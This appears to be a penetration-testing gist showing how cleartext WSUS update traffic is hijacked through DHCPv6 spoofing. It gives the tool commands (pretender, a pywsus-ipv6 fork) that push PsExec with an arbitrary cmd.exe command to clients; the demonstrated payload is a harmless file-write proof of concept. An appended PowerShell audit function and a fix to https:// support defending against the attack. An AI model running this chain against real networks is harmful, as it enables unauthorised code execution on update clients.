Created October 10, 2022 12:33
Cleartext WSUS exploitation with DHCPv6 spoofing
# checking WSUS preferences
PS> reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer
PS> reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer
### after setting up the attack, click the "Check for updates" button
### set up DHCPv6 spoofing
git clone https://github.com/RedTeamPentesting/pretender.git
cd pretender
sudo ./pretender -i eth0 --spoof wsus.lab.local
### setting up the IPv6 PyWSUS fork
git clone https://github.com/cr7pt0pl4gu3/pywsus-ipv6.git
cd pywsus-ipv6
sudo python3 pywsus.py --host '[fe80::394:b41c:206e:bce0]' --port 8530 --executable PsExec64.exe --command '/accepteula /s cmd.exe /c "echo a > C:\\poc2.txt"'
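
The two `reg query` checks at the top decide whether a client is exposed to this at all. As an added example (not part of the original gist), the PowerShell function below turns them into an audit that classifies the configured WSUS URLs by scheme. The function name `Test-WsusTransport` is hypothetical, and `WUStatusServer` is a standard Windows Update policy value that the gist itself does not query.

```powershell
# Added audit example, not part of the original gist.
# Reports whether this client is pointed at a WSUS server over cleartext HTTP.
function Test-WsusTransport {
    param(
        # Policy key queried in the gist; parameterised so a test key can be used.
        [string]$PolicyKey = 'HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate'
    )

    $wu = Get-ItemProperty -Path $PolicyKey -ErrorAction SilentlyContinue
    $au = Get-ItemProperty -Path (Join-Path $PolicyKey 'AU') -ErrorAction SilentlyContinue

    # The WSUS URLs are only honoured when AU\UseWUServer is 1.
    $useWsus = [bool]($au -and $au.UseWUServer -eq 1)

    # Classify each configured URL; TryCreate avoids throwing on malformed values.
    $urls = foreach ($name in 'WUServer', 'WUStatusServer') {
        $value = if ($wu) { $wu.$name } else { $null }
        if (-not $value) { continue }

        $uri = $null
        $ok  = [System.Uri]::TryCreate([string]$value, [System.UriKind]::Absolute, [ref]$uri)
        $transport = if (-not $ok) { 'Unparseable' } elseif ($uri.Scheme -eq 'http') { 'Cleartext' } elseif ($uri.Scheme -eq 'https') { 'TLS' } else { $uri.Scheme }

        [pscustomobject]@{
            Setting    = $name
            Url        = $value
            ServerHost = if ($ok) { $uri.Host } else { $null }   # name the client will resolve
            Transport  = $transport
        }
    }

    $cleartext = @($urls | Where-Object Transport -eq 'Cleartext')

    [pscustomobject]@{
        ComputerName = $env:COMPUTERNAME
        UseWUServer  = $useWsus
        Urls         = @($urls)
        # At risk: WSUS policy is active and at least one URL is plain http://
        AtRisk       = ($useWsus -and $cleartext.Count -gt 0)
    }
}

$result = Test-WsusTransport
$result | Format-List ComputerName, UseWUServer, AtRisk
$result.Urls | Format-Table Setting, Url, ServerHost, Transport
```

A client reported with `AtRisk = True` is fixed by moving the WSUS policy URLs to `https://`; `ServerHost` is the name whose resolution is worth monitoring on that network segment.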